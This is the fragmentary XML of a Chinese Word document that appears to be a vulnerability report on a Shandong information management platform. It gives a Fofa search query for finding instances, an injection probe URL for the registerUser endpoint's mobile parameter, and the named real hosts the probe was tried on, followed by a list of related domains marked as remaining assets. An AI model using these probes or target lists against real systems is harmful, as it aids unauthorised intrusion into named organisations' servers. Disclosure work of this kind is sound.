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Fofa：body=" 山东迪彩信息管理平台"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Poc：url+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>/a/sys/register/registerUser?&amp;mobile=18888888888%27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"http://123.57.51.5:9091/"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http://123.57.51.5:9091/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="3097530"/>
            <wp:effectExtent l="0" t="0" r="952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"http://123.57.51.5:9091/a/sys/register/registerUser?&amp;mobile=18888888888%27"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http://123.57.51.5:9091/a/sys/register/registerUser?&amp;mobile=18888888888%27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228340"/>
            <wp:effectExtent l="0" t="0" r="254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资产二：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"http://123.57.51.5/"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http://123.57.51.5/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="2858770"/>
            <wp:effectExtent l="0" t="0" r="1079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http://123.57.51.5/a/sys/register/registerUser?&amp;mobile=18888888888%27</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="3374390"/>
            <wp:effectExtent l="0" t="0" r="381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资产三：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"https://dcoffice.com.cn/a/login"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https://dcoffice.com.cn/a/login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="3076575"/>
            <wp:effectExtent l="0" t="0" r="63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https://dcoffice.com.cn/a/sys/register/registerUser?&amp;mobile=18888888888%27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3354070"/>
            <wp:effectExtent l="0" t="0" r="508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剩余资产：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https://www.dcoffice.com.cn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dcoffice.com.cn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www.dcoffice.com.cn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https://123.57.51.5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gd.sdzzfy.net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https://gd.sdzzfy.net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https://cwzx.sdzzfy.net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https://lg2.sdzzfy.net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cwzx.sdzzfy.net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lg2.sdzzfy.net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gqoqlwww.sdzzxx.net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https://2003hcw.sdzzxx.net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2003hcw.sdzzxx.net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2714mlz.sdzzxx.net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https://2714mlz.sdzzxx.net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https://gqoqlwww.sdzzxx.net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cpcontacts.sdzzxx.net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https://cpcontacts.sdzzxx.net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autodiscover.xmphoto.net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https://autodiscover.xmphoto.net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https://autodiscover.sdzzxx.net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autodiscover.sdzzxx.net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https://cpcalendars.xmphoto.net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cpcalendars.xmphoto.net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https://cpcalendars.sdzzxx.net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cpcalendars.sdzzxx.net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https://webdisk.sdzzxx.net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webdisk.sdzzxx.net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https://cpanel.xmphoto.net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webdisk.xmphoto.net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https://webdisk.xmphoto.net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smtp.sdzzxx.net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https://smtp.sdzzxx.net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m.xmphoto.net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m.sdzzxx.net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https://m.sdzzxx.net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https://m.xmphoto.net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https://webmail.xmphoto.net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webmail.xmphoto.net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webmail.sdzzxx.net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https://webmail.sdzzxx.net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mail.sdzzxx.net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https://mail.sdzzxx.net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https://sdzzxx.net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www.zxoffice.com.cn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https://www.zxoffice.com.cn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bc.xmphoto.net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https://bc.xmphoto.net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dealer.sdzzxx.net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wxmini.sdzzxx.net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iYmU0YTg3NDNmZjE2MWZjMzZkODA0ODE3NTQ2YTIifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="3E1A6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800080"/>
      <w:u w:val="single"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2024-03-14T14:23:17Z</dcterms:created>
  <dc:creator>86132</dc:creator>
  <cp:lastModifiedBy>㉨</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-14T14:35:11Z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C68E692585DB499699DAB7BD134D208E_12</vt:lpwstr>
  </property>
</Properties>
</file>